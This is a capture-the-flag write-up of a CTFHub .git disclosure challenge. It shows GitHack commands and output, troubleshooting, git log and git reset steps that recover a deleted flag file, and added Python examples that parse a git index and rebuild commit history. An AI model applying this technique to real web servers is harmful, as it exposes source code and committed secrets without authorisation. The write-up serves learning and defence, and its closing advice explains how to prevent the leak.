I. Getting started
A large number of developers currently use git for version control and to deploy sites automatically. If it is configured carelessly, the .git folder may be deployed straight to the production environment, which causes a git disclosure vulnerability. Please try to complete this challenge with BugScanTeam's GitHack.
I spent a long time on this challenge and could not get it to work.
First I fiddled around with how to use the git tool.
II. Pitfall 1
I used the new Kali release for this challenge (Kali from 2022-03; this release has both python2 and python3 installed. Watch out when running the commands later, this is where I tripped up.).
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python3 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git
Traceback (most recent call last):
File "/root/Downloads/GitHack-master/GitHack.py", line 11, in <module>
from lib.common import banner
File "/root/Downloads/GitHack-master/lib/common.py", line 84
except IOError, ex:
^^^^^^^^^^^
SyntaxError: multiple exception types must be parenthesized
At first I did not know the git command, so I went straight to Baidu. The search turned up a pile of messy results, which I went through one by one. In the end I worked out the command format: python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/
III. Pitfall 2
But running it gave an error
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-4e45df1c40b42551.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] refs/heads/master
[*] logs/refs/heads/master
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
Traceback (most recent call last):
File "GitHack.py", line 40, in <module>
main()
File "GitHack.py", line 21, in main
init()
File "GitHack.py", line 35, in init
start()
File "/root/Downloads/GitHack-master/lib/controler.py", line 21, in start
if method_a() or method_b() or method_c():
File "/root/Downloads/GitHack-master/lib/controler.py", line 56, in method_c
clone_from_cache()
File "/root/Downloads/GitHack-master/lib/git.py", line 116, in clone_from_cache
cache_objects()
File "/root/Downloads/GitHack-master/lib/git.py", line 265, in cache_objects
for entry in parse_index(os.path.join(paths.GITHACK_DIST_TARGET_GIT_PATH, "index")):
File "/root/Downloads/GitHack-master/lib/git.py", line 291, in parse_index
with open(filename, "rb") as o:
IOError: [Errno 2] No such file or directory: '/root/Downloads/GitHack-master/dist/challenge-4e45df1c40b42551.sandbox.ctfhub.com_10800/.git/index'
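The traceback above dies in parse_index, the step where GitHack reads the downloaded .git/index to learn which tracked files exist and which blob objects (objects/xx/yyyy) it must fetch next; the run failed because .git/index was never downloaded. The block below is an added example, not GitHack's own code: it parses the git index format (version 2, which a stock git writes, plus the version 3 extended-flag variant), verifies the trailing checksum so a truncated download is reported rather than misread, and handles the missing-file case with a message instead of a traceback. It also makes the defender's point concrete: a single leaked index file exposes every tracked path with its size and blob hash. The file names mirror the ones in this write-up but the contents are constructed, and blob_sha1, build_index_bytes and load_index are names chosen here.

```python
import hashlib
import os
import struct
from dataclasses import dataclass
from typing import List, Optional

# Git index v2 layout (from git's index-format documentation): a 12-byte
# header, fixed-size entries each followed by the path and NUL padding to an
# 8-byte boundary, optional extensions, then a SHA-1 checksum of everything.
INDEX_HEADER = struct.Struct(">4sII")     # signature "DIRC", version, entry count
ENTRY_FIXED = struct.Struct(">10I20sH")   # ctime/mtime/dev/ino/mode/uid/gid/size, sha1, flags


@dataclass
class IndexEntry:
    path: str
    sha1: str
    mode: int
    size: int

    def object_path(self) -> str:
        """Where the blob lives under .git/: objects/<2 hex>/<38 hex>."""
        return f"objects/{self.sha1[:2]}/{self.sha1[2:]}"


def parse_index_bytes(data: bytes) -> List[IndexEntry]:
    """Parse an index image; raise ValueError on anything that is not a sane v2/v3 index."""
    if len(data) < INDEX_HEADER.size + 20:
        raise ValueError("index too short to be valid")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch: truncated or corrupted download")
    sig, version, count = INDEX_HEADER.unpack_from(data, 0)
    if sig != b"DIRC":
        raise ValueError("bad signature, not a git index")
    if version not in (2, 3):
        raise ValueError(f"index version {version} not handled here (v4 uses path-prefix compression)")
    entries, offset = [], INDEX_HEADER.size
    for _ in range(count):
        start = offset
        fields = ENTRY_FIXED.unpack_from(data, offset)
        mode, size, sha1, flags = fields[6], fields[9], fields[10].hex(), fields[11]
        offset += ENTRY_FIXED.size
        if version == 3 and flags & 0x4000:   # "extended" bit: one more 16-bit flags word follows
            offset += 2
        name_len = flags & 0x0FFF
        if name_len == 0x0FFF:                 # paths of 4095+ bytes: scan for the NUL instead
            name_len = data.index(b"\0", offset) - offset
        name = data[offset:offset + name_len]
        offset += name_len
        offset += 8 - ((offset - start) % 8)  # NUL padding to 8 bytes, always at least one byte
        entries.append(IndexEntry(name.decode("utf-8", "replace"), sha1, mode, size))
    return entries


def load_index(git_dir: str) -> Optional[List[IndexEntry]]:
    """Read <git_dir>/index; return None (not a traceback) when the download left it missing."""
    path = os.path.join(git_dir, "index")
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except FileNotFoundError:
        print(f"[-] {path} missing: the target did not serve .git/index, nothing to enumerate")
        return None
    return parse_index_bytes(data)


def blob_sha1(content: bytes) -> str:
    """SHA-1 git assigns to a blob: hash of 'blob <len>\\0<content>'."""
    return hashlib.sha1(b"blob %d\0" % len(content) + content).hexdigest()


def build_index_bytes(files: dict) -> bytes:
    """Build a v2 index image for {path: content}; a constructed fixture, not a real target's index."""
    out = bytearray(INDEX_HEADER.pack(b"DIRC", 2, len(files)))
    for path in sorted(files):                 # git keeps entries sorted by path bytes
        content, name = files[path], path.encode()
        entry = bytearray(ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, len(content),
                                           bytes.fromhex(blob_sha1(content)), len(name)))
        entry += name
        entry += b"\0" * (8 - (len(entry) % 8))
        out += entry
    out += hashlib.sha1(out).digest()
    return bytes(out)


# Constructed sample mirroring the file names seen in this write-up; contents are made up.
SAMPLE_FILES = {
    "index.html": b"<html>hello</html>\n",
    "50x.html": b"<html>error</html>\n",
    "9432810028411.txt": b"hello\n",
}

if __name__ == "__main__":
    for entry in parse_index_bytes(build_index_bytes(SAMPLE_FILES)):
        print(f"{entry.mode:o} {entry.sha1} {entry.size:5d} {entry.path} -> {entry.object_path()}")
    load_index("/nonexistent/constructed/.git")
```

Running the block prints one line per tracked path with the objects/ location a recovery tool would fetch next, then shows the graceful message for a missing index. The checksum verification matters in practice: a web server that answers .git/index with an error page instead of the file would otherwise be parsed as garbage.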
IV. After that I still had no lead; could some expert give me a pointer?
Judging from other people's blogs, the normal flow should be:
Case 1
After a successful scan, GitHack creates a dist folder holding the reconstructed files
Use git log to view the history
You can see the file went through three operations: remove flag, add flag and init
So to get the flag, we can use diff to compare the state before and after the flag operations
1. Method 1: use git diff to compare the files
git diff d7b0a8166625cd0c0e09ff80aeb44d023fa9b012 21141e26cc1462d5b872e5cc166bdb1807f9a060
Method 2: use git reset to roll the files back to an earlier version
git reset --hard d7b0a8166625cd0c0e09ff80aeb44d023fa9b012
Case 2
2. Use GitHack to download the site's git files as a backup, then inspect them
3. Open the folder under the list directory, open Git Bash there, and follow the challenge's hint about the log
Use git log to view the commit history; the previous version is called add flag, so restore to that version
4. You will find a txt file has appeared; open it and you get the flag
5. That is the end of this challenge; go back and submit the flag. Success!!!
2022-09-25 21:48: I came back to tackle it again, and this time it worked
The earlier error was because the challenge's time limit had expired. Awkward~~~~~
Normal output
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-cc3839282f4428a7.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/79/5c7b1a9772ee6fd0c291fb1afe6157401b4215
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/82/2e64a05799797dcbc2c5b0d0f3c2abb7d34184
[*] objects/27/1c0b7781dfcb5837db366cc652b50248d9aced
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/32/f9ca9df638c0fe91af9472ac6a0e977841382c
[*] objects/0d/875d79a5a65bb020fc8fd17a9bd67f6b7eacf8
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─#
Then just run the commands in sequence
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# ls
50x.html index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
Use the git log and git reset --hard commands
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# git log
commit 795c7b1a9772ee6fd0c291fb1afe6157401b4215 (HEAD -> master)
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
remove flag
commit 822e64a05799797dcbc2c5b0d0f3c2abb7d34184
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
add flag
commit 32f9ca9df638c0fe91af9472ac6a0e977841382c
Author: CTFHub <[email protected]>
Date: Sun Sep 25 13:42:40 2022 +0000
init
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# git reset --hard 822e64a05799797dcbc2c5b0d0f3c2abb7d34184
HEAD 现在位于 822e64a add flag
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─# ls
50x.html 9432810028411.txt index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-cc3839282f4428a7.sandbox.ctfhub.com_10800]
└─#
vim 9432810028411.txt and you can see the flag value.
Copyright belongs to the original author Mr_admin. If there is any infringement, please contact us to remove it.
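The git log and git reset --hard steps above work because a commit that removes a file only drops it from the newest tree: the blob and the earlier tree stay in objects/ and remain reachable through the parent pointer, so a leaked .git directory hands over every version that was ever committed. As an added example (not code from this write-up, from GitHack or from git itself), the following rebuilds that init / add flag / remove flag history in memory using git's actual loose-object encoding (zlib-compressed "<type> <size>\0<body>", addressed by the SHA-1 of the uncompressed bytes) and then finds the file that HEAD no longer lists. ObjectStore, deleted_but_recoverable and build_sample_repo are names chosen here; the file contents, author identity and timestamp are constructed.

```python
import hashlib
import zlib
from typing import Dict, List, Optional, Tuple


class ObjectStore:
    """Stand-in for .git/objects: sha1 -> zlib-compressed loose object, as git stores them."""

    def __init__(self) -> None:
        self.objects: Dict[str, bytes] = {}

    def put(self, kind: str, body: bytes) -> str:
        raw = b"%s %d\0" % (kind.encode(), len(body)) + body   # "<type> <size>\0<body>"
        sha = hashlib.sha1(raw).hexdigest()
        self.objects[sha] = zlib.compress(raw)
        return sha

    def get(self, sha: str) -> Tuple[str, bytes]:
        raw = zlib.decompress(self.objects[sha])
        if hashlib.sha1(raw).hexdigest() != sha:   # an object that does not hash right is junk
            raise ValueError(f"object {sha} is corrupt")
        header, body = raw.split(b"\0", 1)
        return header.decode().split(" ")[0], body


def write_tree(store: ObjectStore, files: Dict[str, bytes]) -> str:
    """Store each file as a blob and return the sha of a flat tree listing them."""
    body = b""
    for name in sorted(files):   # git sorts tree entries by name
        body += b"100644 " + name.encode() + b"\0" + bytes.fromhex(store.put("blob", files[name]))
    return store.put("tree", body)


def write_commit(store: ObjectStore, tree: str, parent: Optional[str], message: str) -> str:
    ident = "CTFHub <ctfhub@example.invalid> 0 +0000"   # constructed identity and timestamp
    lines = [f"tree {tree}"] + ([f"parent {parent}"] if parent else [])
    lines += [f"author {ident}", f"committer {ident}", "", message]
    return store.put("commit", ("\n".join(lines) + "\n").encode())


def read_tree(store: ObjectStore, tree: str) -> Dict[str, str]:
    """Decode a tree object into {path: blob sha}."""
    kind, body = store.get(tree)
    if kind != "tree":
        raise ValueError(f"{tree} is a {kind}, not a tree")
    files, pos = {}, 0
    while pos < len(body):
        nul = body.index(b"\0", pos)
        _mode, name = body[pos:nul].decode().split(" ", 1)
        files[name] = body[nul + 1:nul + 21].hex()   # 20 raw sha1 bytes follow the NUL
        pos = nul + 21
    return files


def history(store: ObjectStore, head: str) -> List[Tuple[str, str, Dict[str, str]]]:
    """Walk first-parent history from HEAD: (commit sha, message, tree contents), newest first."""
    out: List[Tuple[str, str, Dict[str, str]]] = []
    sha: Optional[str] = head
    while sha:
        kind, body = store.get(sha)
        if kind != "commit":
            raise ValueError(f"{sha} is a {kind}, not a commit")
        headers, message = body.split(b"\n\n", 1)
        fields = dict(line.split(" ", 1) for line in headers.decode().splitlines())
        out.append((sha, message.decode().strip(), read_tree(store, fields["tree"])))
        sha = fields.get("parent")   # None at the root commit ends the walk
    return out


def deleted_but_recoverable(store: ObjectStore, head: str) -> Dict[str, bytes]:
    """Files absent from HEAD's tree but present in an ancestor; their blobs are still in the store."""
    commits = history(store, head)
    current = commits[0][2]
    found: Dict[str, bytes] = {}
    for _sha, _msg, files in commits[1:]:
        for name, blob in files.items():
            if name not in current and name not in found:
                found[name] = store.get(blob)[1]
    return found


def build_sample_repo() -> Tuple[ObjectStore, str]:
    """Constructed three-commit history shaped like the git log in this write-up."""
    store = ObjectStore()
    base = {"index.html": b"<html>hi</html>\n", "50x.html": b"<html>error</html>\n"}
    c1 = write_commit(store, write_tree(store, base), None, "init")
    with_flag = dict(base, **{"9432810028411.txt": b"constructed secret, not a real flag\n"})
    c2 = write_commit(store, write_tree(store, with_flag), c1, "add flag")
    c3 = write_commit(store, write_tree(store, base), c2, "remove flag")
    return store, c3


if __name__ == "__main__":
    store, head = build_sample_repo()
    for sha, msg, files in history(store, head):
        print(sha[:7], msg, sorted(files))
    for name, content in deleted_but_recoverable(store, head).items():
        print("still recoverable:", name, content)
```

The walk prints the same three messages the write-up's git log shows, with the txt file present only in the middle commit, and then recovers its content straight from the blob without touching a working tree. For anyone who has ever deployed a .git directory the lesson is the same: deleting the file in a later commit does not undo the exposure, so keep .git out of the web root (or deny it in the server configuration) and rotate anything that was ever committed.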